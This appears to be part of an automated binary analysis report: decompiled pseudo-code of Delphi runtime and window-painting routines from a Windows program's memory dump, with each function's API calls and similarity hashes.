    					_t94 = _t68 - 5;
    					if(_t94 == 0) {
    						_t97 = E0041D068( *((intOrPtr*)(_v8 + 0x170)));
    						 *((intOrPtr*)( *_v8 + 0x44))();
    						FillRect( *(_v12 + 4),  &_v112, _t97);
    						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
    							GetClientRect( *(_v8 + 0x254),  &_v96);
    							FillRect( *(_v12 + 4),  &_v96, E0041D068( *((intOrPtr*)(_v8 + 0x170))));
    						}
    						_t105 = _v12;
    						 *((intOrPtr*)(_t105 + 0xc)) = 1;
    					} else {
    						_t118 = _t94 - 0x2b;
    						if(_t118 == 0) {
    							E00444E54(_t150);
    							_t105 = _v8;
    							if( *((char*)(_t105 + 0x22f)) == 2) {
    								if(E0044537C(_v8) == 0 || E00444EA0(_t138, _t150) == 0) {
    									_t146 = 1;
    								} else {
    									_t146 = 0;
    								}
    								_t105 = E00442190( *(_v8 + 0x254), _t146);
    							}
    						} else {
    							if(_t118 != 0x45) {
    								_t105 = E00444E54(_t150);
    							} else {
    								E00444E54(_t150);
    								_t105 = _v12;
    								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
    									_t105 = _v12;
    									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
    								}
    							}
    						}
    					}
    					return _t105;
    				}
    			}

    APIs
    • FillRect.USER32(?,?), ref: 00444F59
    • GetClientRect.USER32(00000000,?), ref: 00444F84
    • FillRect.USER32(?,?,00000000), ref: 00444FA3
      • Part of subcall function 00444E54: CallWindowProcA.USER32(?,?,?,?,?), ref: 00444E8E
    • BeginPaint.USER32(?,?), ref: 0044501B
    • GetWindowRect.USER32(?,?), ref: 00445048
    • EndPaint.USER32(?,?,004450BC), ref: 004450A8
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Rect$FillPaintWindow$BeginCallClientProc
    • String ID:
    • API String ID: 901200654-0
    • Opcode ID: aff4893d9b9e2c9666173a6c9f99ab74db62f8aa084774062cd4367c2ffb8da8
    • Instruction ID: 454e2128855d1b730d2b51f27d8d7d13492bbf731180744bb3852be94e670c1e
    • Opcode Fuzzy Hash: aff4893d9b9e2c9666173a6c9f99ab74db62f8aa084774062cd4367c2ffb8da8
    • Instruction Fuzzy Hash: 1D512D74A00609EFDB00DBE9C589E9DB7F8AF48314F1581AAF414EB352D738AE45CB48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00401C50() {
    				void* _v8;
    				intOrPtr* _v12;
    				void* _t13;
    				void* _t15;
    				intOrPtr* _t18;
    				void* _t31;
    				void* _t37;
    				intOrPtr _t42;
    				void* _t44;
    				void* _t46;
    				intOrPtr _t47;
    
    				_t44 = _t46;
    				_t47 = _t46 + 0xfffffff8;
    				if( *0x47b5bc == 0) {
    					return _t13;
    				} else {
    					_push(_t44);
    					_push(E00401D44);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t47;
    					if( *0x47b045 != 0) {
    						_push(0x47b5c4);
    						L00401358();
    					}
    					 *0x47b5bc = 0;
    					_t15 =  *0x47b61c; // 0x5bc9b8
    					LocalFree(_t15);
    					 *0x47b61c = 0;
    					_t18 =  *0x47b5e4; // 0x5ba724
    					_v12 = _t18;
    					while(0x47b5e4 != _v12) {
    						VirtualFree( *(_v12 + 8), 0, 0x8000);
    						_v12 =  *_v12;
    					}
    					E004013F4(0x47b5e4);
    					E004013F4(0x47b5f4);
    					E004013F4(0x47b620);
    					_t31 =  *0x47b5dc; // 0x5ba0f0
    					_v8 = _t31;
    					while(_v8 != 0) {
    						 *0x47b5dc =  *_v8;
    						LocalFree(_v8);
    						_t37 =  *0x47b5dc; // 0x5ba0f0
    						_v8 = _t37;
    					}
    					_pop(_t42);
    					 *[fs:eax] = _t42;
    					_push(0x401d4b);
    					if( *0x47b045 != 0) {
    						_push(0x47b5c4);
    						L00401360();
    					}
    					_push(0x47b5c4);
    					L00401368();
    					return 0;
    				}
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401C7F
    • LocalFree.KERNEL32(005BC9B8,00000000,00401D44), ref: 00401C91
    • VirtualFree.KERNEL32(?,00000000,00008000,005BC9B8,00000000,00401D44), ref: 00401CB5
    • LocalFree.KERNEL32(00000000,?,00000000,00008000,005BC9B8,00000000,00401D44), ref: 00401D06
    • RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401D34
    • RtlDeleteCriticalSection.NTDLL(0047B5C4), ref: 00401D3E
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
    • String ID:
    • API String ID: 3782394904-0
    • Opcode ID: 358fe68b41b34c4f71fb20b6b5e9b80eebec25c97cf1363d1e6e8ada2e81b474
    • Instruction ID: 99de1bbe63b05b8271605f64c4c6a66148645650e88a1b90d21e67d1f51eefe7
    • Opcode Fuzzy Hash: 358fe68b41b34c4f71fb20b6b5e9b80eebec25c97cf1363d1e6e8ada2e81b474
    • Instruction Fuzzy Hash: 4D213274904244AFE711DBA9D845B8E77E4DB05308F50807BE808A77E1C73C9980DB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428D4C(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				char _v8;
    				void* _t20;
    				void* _t21;
    				void* _t27;
    				void* _t31;
    				void* _t35;
    				intOrPtr* _t43;
    
    				_t43 =  &_v8;
    				_t20 =  *0x47995c; // 0x0
    				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
    				_t21 =  *0x47995c; // 0x0
    				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
    				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
    					SetWindowLongA(_a4, 0xfffffff4, _a4);
    				}
    				_t27 =  *0x47995c; // 0x0
    				SetPropA(_a4,  *0x47bb0a & 0x0000ffff, _t27);
    				_t31 =  *0x47995c; // 0x0
    				SetPropA(_a4,  *0x47bb08 & 0x0000ffff, _t31);
    				_t35 =  *0x47995c; // 0x0
    				 *0x47995c = 0;
    				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
    				return  *_t43;
    			}

    APIs
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00428D74
    • GetWindowLongA.USER32(?,000000F0), ref: 00428D7F
    • GetWindowLongA.USER32(?,000000F4), ref: 00428D91
    • SetWindowLongA.USER32(?,000000F4,?), ref: 00428DA4
    • SetPropA.USER32(?,00000000,00000000), ref: 00428DBB
    • SetPropA.USER32(?,00000000,00000000), ref: 00428DD2
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: LongWindow$Prop
    • String ID:
    • API String ID: 3887896539-0
    • Opcode ID: b2816ec1cffd5b56bff52f5c5d0687fa979dec1f46ec9438c02b03c3d489360d
    • Instruction ID: c7e75729d8d2606f5068b16dba0a7983d3969893cafcbacc8782215698b8d8c1
    • Opcode Fuzzy Hash: b2816ec1cffd5b56bff52f5c5d0687fa979dec1f46ec9438c02b03c3d489360d
    • Instruction Fuzzy Hash: 0411FEB5201105BFDF40EF99DC44E9A3BA8EB09360F108525BA19D72D1D735DD50CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D88C(void* __eax) {
    				void* _t36;
    
    				_t36 = __eax;
    				UnrealizeObject(E0041D068( *((intOrPtr*)(__eax + 0x14))));
    				SelectObject( *(_t36 + 4), E0041D068( *((intOrPtr*)(_t36 + 0x14))));
    				if(E0041D148( *((intOrPtr*)(_t36 + 0x14))) != 0) {
    					SetBkColor( *(_t36 + 4),  !(E0041C3A8(E0041D02C( *((intOrPtr*)(_t36 + 0x14))))));
    					return SetBkMode( *(_t36 + 4), 1);
    				} else {
    					SetBkColor( *(_t36 + 4), E0041C3A8(E0041D02C( *((intOrPtr*)(_t36 + 0x14)))));
    					return SetBkMode( *(_t36 + 4), 2);
    				}
    			}

    APIs
      • Part of subcall function 0041D068: CreateBrushIndirect.GDI32(?), ref: 0041D112
    • UnrealizeObject.GDI32(00000000), ref: 0041D898
    • SelectObject.GDI32(?,00000000), ref: 0041D8AA
    • SetBkColor.GDI32(?,00000000), ref: 0041D8CD
    • SetBkMode.GDI32(?,00000002), ref: 0041D8D8
    • SetBkColor.GDI32(?,00000000), ref: 0041D8F3
    • SetBkMode.GDI32(?,00000001), ref: 0041D8FE
      • Part of subcall function 0041C3A8: GetSysColor.USER32(?), ref: 0041C3B2
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
    • String ID:
    • API String ID: 3527656728-0
    • Opcode ID: 8effa9a3aaf91be0486b0b5ac50cd501f26fcab478501b83c7975bdf7d960646
    • Instruction ID: 106faa5e388aafaf7305692d19dc8e9c727b313b414877f3d4be70fb462fcbae
    • Opcode Fuzzy Hash: 8effa9a3aaf91be0486b0b5ac50cd501f26fcab478501b83c7975bdf7d960646
    • Instruction Fuzzy Hash: 83F0BBB1A40200ABCE00FFBADDC6D4B3B9C5F08309700445AB905EF29BCA3DD8608739
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405EED(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x47b5b4)) =  *((intOrPtr*)(__eax - 0x47b5b4)) + __eax - 0x47b5b4;
    				 *0x479008 = 2;
    				 *0x47b014 = 0x4011fc;
    				 *0x47b018 = 0x401204;
    				 *0x47b046 = 2;
    				 *0x47b000 = E00404FA0;
    				if(E004032B0() != 0) {
    					_t3 = E004032E0();
    				}
    				E004033A4(_t3);
    				 *0x47b04c = 0xd7b0;
    				 *0x47b218 = 0xd7b0;
    				 *0x47b3e4 = 0xd7b0;
    				 *0x47b03c = GetCommandLineA();
    				 *0x47b038 = E0040130C();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x47b5b8 = E00405E24(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x47b5b8 = E00405E24(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x47b5b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x47b030 = _t11;
    				return _t11;
    			}

    APIs
      • Part of subcall function 004032B0: GetKeyboardType.USER32(00000000), ref: 004032B5
      • Part of subcall function 004032B0: GetKeyboardType.USER32(00000001), ref: 004032C1
    • GetCommandLineA.KERNEL32 ref: 00405F53
    • GetVersion.KERNEL32 ref: 00405F67
    • GetVersion.KERNEL32 ref: 00405F78
    • GetCurrentThreadId.KERNEL32 ref: 00405FB4
      • Part of subcall function 004032E0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403302
      • Part of subcall function 004032E0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403335
      • Part of subcall function 004032E0: RegCloseKey.ADVAPI32(?,00403358,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040334B
    • GetThreadLocale.KERNEL32 ref: 00405F94
      • Part of subcall function 00405E24: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405E8A), ref: 00405E4A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
    • String ID:
    • API String ID: 3734044017-0
    • Opcode ID: ebba62bb8ed549545e8d677d5221f979693053b389705836cf4b91af096e17ba
    • Instruction ID: e1ede18ddd7f021d7f4f9b44b2d37be9f1aa5bd192689019796b73b222782ef7
    • Opcode Fuzzy Hash: ebba62bb8ed549545e8d677d5221f979693053b389705836cf4b91af096e17ba
    • Instruction Fuzzy Hash: 10011EB440478699EB11BF71A84A34A3AA0EB11308F1044BFD558AA3F2EB7C01848BDE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0040BA30(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				intOrPtr _v12;
    				struct _MEMORY_BASIC_INFORMATION _v40;
    				char _v301;
    				char _v308;
    				intOrPtr _v312;
    				char _v316;
    				char _v320;
    				char _v324;
    				intOrPtr _v328;
    				char _v332;
    				void* _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				char _v352;
    				intOrPtr _v356;
    				char _v360;
    				char _v364;
    				char _v368;
    				void* _v372;
    				char _v376;
    				intOrPtr _t55;
    				intOrPtr _t65;
    				intOrPtr _t88;
    				intOrPtr _t92;
    				intOrPtr _t95;
    				intOrPtr _t107;
    				void* _t114;
    				void* _t115;
    				void* _t118;
    
    				_t115 = __esi;
    				_t114 = __edi;
    				_t98 = __ecx;
    				_v376 = 0;
    				_v340 = 0;
    				_v348 = 0;
    				_v344 = 0;
    				_v8 = 0;
    				_push(_t118);
    				_push(0x40bbf3);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t118 + 0xfffffe8c;
    				_t95 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
    					_t55 =  *0x479fcc; // 0x406e64
    					E00405DCC(_t55, __ecx,  &_v8);
    				} else {
    					_t92 =  *0x47a124; // 0x406e5c
    					E00405DCC(_t92, __ecx,  &_v8);
    				}
    				_v12 =  *((intOrPtr*)(_t95 + 0x18));
    				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
    				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
    					_v372 =  *(_t95 + 0xc);
    					_v368 = 5;
    					_v364 = _v8;
    					_v360 = 0xb;
    					_v356 = _v12;
    					_v352 = 5;
    					_t65 =  *0x479fd8; // 0x406e0c
    					E00405DCC(_t65, _t98,  &_v376);
    					E0040B658(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
    				} else {
    					_v336 =  *(_t95 + 0xc);
    					_v332 = 5;
    					E00404450( &_v344, 0x105,  &_v301);
    					E00408504(_v344, 0x105,  &_v340);
    					_v328 = _v340;
    					_v324 = 0xb;
    					_v320 = _v8;
    					_v316 = 0xb;
    					_v312 = _v12;
    					_v308 = 5;
    					_t88 =  *0x47a034; // 0x406f04
    					E00405DCC(_t88, 0x105,  &_v348);
    					E0040B658(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
    				}
    				_pop(_t107);
    				 *[fs:eax] = _t107;
    				_push(E0040BBFA);
    				E004041E0( &_v376);
    				E00404204( &_v348, 3);
    				return E004041E0( &_v8);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BBF3), ref: 0040BA9D
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BBF3), ref: 0040BABF
      • Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FileLoadModuleNameQueryStringVirtual
    • String ID: 0w@$\n@$dn@
    • API String ID: 902310565-2541937206
    • Opcode ID: f6782b070e71f58a5011ba0ab88ba44714884a3a32117b389ef0351287ffb3a6
    • Instruction ID: b0dd67af656762c7e97f47114aef24cedb7d8fe3e8e177282f8d088163ffabc9
    • Opcode Fuzzy Hash: f6782b070e71f58a5011ba0ab88ba44714884a3a32117b389ef0351287ffb3a6
    • Instruction Fuzzy Hash: AD51E470A00658DFDB61DF68CD85BC9BBF4AB48304F4044EAE508AB291D778AE84CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B3BC(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v277;
    				char _v538;
    				char _v794;
    				struct _MEMORY_BASIC_INFORMATION _v824;
    				char _v828;
    				intOrPtr _v832;
    				char _v836;
    				intOrPtr _v840;
    				char _v844;
    				intOrPtr _v848;
    				char _v852;
    				char* _v856;
    				char _v860;
    				char _v864;
    				char _v1120;
    				void* __edi;
    				struct HINSTANCE__* _t45;
    				intOrPtr _t58;
    				struct HINSTANCE__* _t60;
    				void* _t78;
    				intOrPtr* _t83;
    				void* _t94;
    				void* _t95;
    				void* _t102;
    
    				_t102 = __fp0;
    				_t84 = __ecx;
    				_t94 = __ecx;
    				_t95 = __edx;
    				_t83 = __eax;
    				VirtualQuery(__edx,  &_v824, 0x1c);
    				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
    					_t45 =  *0x47b660; // 0x400000
    					GetModuleFileNameA(_t45,  &_v538, 0x105);
    					_v16 = E0040B3B0(_t95);
    				} else {
    					_v16 = _t95 - _v824.AllocationBase;
    				}
    				E004086A4( &_v277, 0x104, E0040C394( &_v538, _t84, 0x5c) + 1);
    				_v8 = 0x40b54c;
    				_v12 = 0x40b54c;
    				_t91 =  *0x407084; // 0x4070d0
    				if(E00403604(_t83, _t91) != 0) {
    					_v8 = E004046A0( *((intOrPtr*)(_t83 + 4)));
    					_t78 = E00408640(_v8, _t94);
    					if(_t78 != 0) {
    						_t91 = _v8;
    						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
    							_v12 = 0x40b550;
    						}
    					}
    				}
    				_t58 =  *0x47a0e8; // 0x406e34
    				_t21 = _t58 + 4; // 0xffe9
    				_t60 =  *0x47b660; // 0x400000
    				LoadStringA(E00405290(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
    				E004033BC( *_t83,  &_v1120);
    				_v864 =  &_v1120;
    				_v860 = 4;
    				_v856 =  &_v277;
    				_v852 = 6;
    				_v848 = _v16;
    				_v844 = 5;
    				_v840 = _v8;
    				_v836 = 6;
    				_v832 = _v12;
    				_v828 = 6;
    				E00408D00(_t94, _a4, _t102, 4,  &_v864);
    				return E00408640(_t94, _t94);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FileModuleName$LoadQueryStringVirtual
    • String ID: 4n@
    • API String ID: 3990497365-1367446503
    • Opcode ID: 44968bae4f9ef14eb2b8bf7f419ae5663944d8900fc040b47ab0cc494bdda230
    • Instruction ID: abc8db870bbcfda5cc4450769f027c33700e98228bdea53df84d11bceb803542
    • Opcode Fuzzy Hash: 44968bae4f9ef14eb2b8bf7f419ae5663944d8900fc040b47ab0cc494bdda230
    • Instruction Fuzzy Hash: 7841E970A006589FCB11DF59CD85B9EB7B8EB48304F0440FAEA08E7291D7789F848F99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B3BA(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v277;
    				char _v538;
    				char _v794;
    				struct _MEMORY_BASIC_INFORMATION _v824;
    				char _v828;
    				intOrPtr _v832;
    				char _v836;
    				intOrPtr _v840;
    				char _v844;
    				intOrPtr _v848;
    				char _v852;
    				char* _v856;
    				char _v860;
    				char _v864;
    				char _v1120;
    				void* __edi;
    				struct HINSTANCE__* _t45;
    				intOrPtr _t58;
    				struct HINSTANCE__* _t60;
    				void* _t78;
    				intOrPtr* _t84;
    				void* _t97;
    				void* _t100;
    				void* _t114;
    
    				_t86 = __ecx;
    				_t97 = __ecx;
    				_t100 = __edx;
    				_t84 = __eax;
    				VirtualQuery(__edx,  &_v824, 0x1c);
    				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
    					_t45 =  *0x47b660; // 0x400000
    					GetModuleFileNameA(_t45,  &_v538, 0x105);
    					_v16 = E0040B3B0(_t100);
    				} else {
    					_v16 = _t100 - _v824.AllocationBase;
    				}
    				E004086A4( &_v277, 0x104, E0040C394( &_v538, _t86, 0x5c) + 1);
    				_v8 = 0x40b54c;
    				_v12 = 0x40b54c;
    				_t93 =  *0x407084; // 0x4070d0
    				if(E00403604(_t84, _t93) != 0) {
    					_v8 = E004046A0( *((intOrPtr*)(_t84 + 4)));
    					_t78 = E00408640(_v8, _t97);
    					if(_t78 != 0) {
    						_t93 = _v8;
    						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
    							_v12 = 0x40b550;
    						}
    					}
    				}
    				_t58 =  *0x47a0e8; // 0x406e34
    				_t21 = _t58 + 4; // 0xffe9
    				_t60 =  *0x47b660; // 0x400000
    				LoadStringA(E00405290(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
    				E004033BC( *_t84,  &_v1120);
    				_v864 =  &_v1120;
    				_v860 = 4;
    				_v856 =  &_v277;
    				_v852 = 6;
    				_v848 = _v16;
    				_v844 = 5;
    				_v840 = _v8;
    				_v836 = 6;
    				_v832 = _v12;
    				_v828 = 6;
    				E00408D00(_t97, _a4, _t114, 4,  &_v864);
    				return E00408640(_t97, _t97);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FileModuleName$LoadQueryStringVirtual
    • String ID: 4n@
    • API String ID: 3990497365-1367446503
    • Opcode ID: cace2300fae6ea98d17bc0197f0dc988fc7fdf201818fed84b48544fd9351745
    • Instruction ID: f2dd7514a248642dcad931f283bb70ad1c74d4f6ac89fa753c81d6b2a783f548
    • Opcode Fuzzy Hash: cace2300fae6ea98d17bc0197f0dc988fc7fdf201818fed84b48544fd9351745
    • Instruction Fuzzy Hash: E441D870A006589FDB51DB59CD85B9EB7E8EB48304F0440FAA608E7291D7789F848F99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E00419666(void* __eax, void* __ebx, void* __edi, void* __esi) {
    				char _v5;
    				intOrPtr* _v12;
    				long _v16;
    				char _v20;
    				char _v24;
    				long _t22;
    				char _t29;
    				void* _t53;
    				intOrPtr _t61;
    				intOrPtr* _t62;
    				intOrPtr _t63;
    				intOrPtr _t66;
    				intOrPtr _t67;
    				void* _t72;
    				void* _t73;
    				intOrPtr _t74;
    
    				_t72 = _t73;
    				_t74 = _t73 + 0xffffffec;
    				_push(__esi);
    				_push(__edi);
    				_t53 = __eax;
    				_t22 = GetCurrentThreadId();
    				_t62 =  *0x47a11c; // 0x47b030
    				if(_t22 !=  *_t62) {
    					_v24 = GetCurrentThreadId();
    					_v20 = 0;
    					_t61 =  *0x479fc0; // 0x410b4c
    					E0040B714(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
    					E00403BF4();
    				}
    				if(_t53 <= 0) {
    					E00419640();
    				} else {
    					E0041964C(_t53);
    				}
    				_v16 = 0;
    				_push(0x47b884);
    				L0040628C();
    				_push(_t72);
    				_push(0x4197f6);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t74;
    				_v16 = InterlockedExchange(0x4793e8, _v16);
    				_push(_t72);
    				_push(0x4197d7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t74;
    				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
    					_t29 = 0;
    				} else {
    					_t29 = 1;
    				}
    				_v5 = _t29;
    				if(_v5 == 0) {
    					L16:
    					_pop(_t63);
    					 *[fs:eax] = _t63;
    					_push(E004197DE);
    					return E0040346C(_v16);
    				} else {
    					if( *((intOrPtr*)(_v16 + 8)) > 0) {
    						_v12 = E00413E68(_v16, 0);
    						E00413D58(_v16, 0);
    						L004063B4();
    						 *[fs:eax] = _t74;
    						 *[fs:eax] = _t74;
    						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4197a1, _t72, 0x47b884);
    						_pop(_t66);
    						 *[fs:eax] = _t66;
    						_t67 = 0x419772;
    						 *[fs:eax] = _t67;
    						_push(E004197A8);
    						_push(0x47b884);
    						L0040628C();
    						return 0;
    					} else {
    						goto L16;
    					}
    				}
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00419673
    • GetCurrentThreadId.KERNEL32 ref: 00419682
    • RtlEnterCriticalSection.NTDLL(0047B884), ref: 004196C7
    • InterlockedExchange.KERNEL32(004793E8,?), ref: 004196E3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
    • String ID: 8&A
    • API String ID: 2380408948-389848856
    • Opcode ID: d28a535c856f93c6a4f2099c5b9d9603b9f422e21454ec69e133c63dd92d6dbe
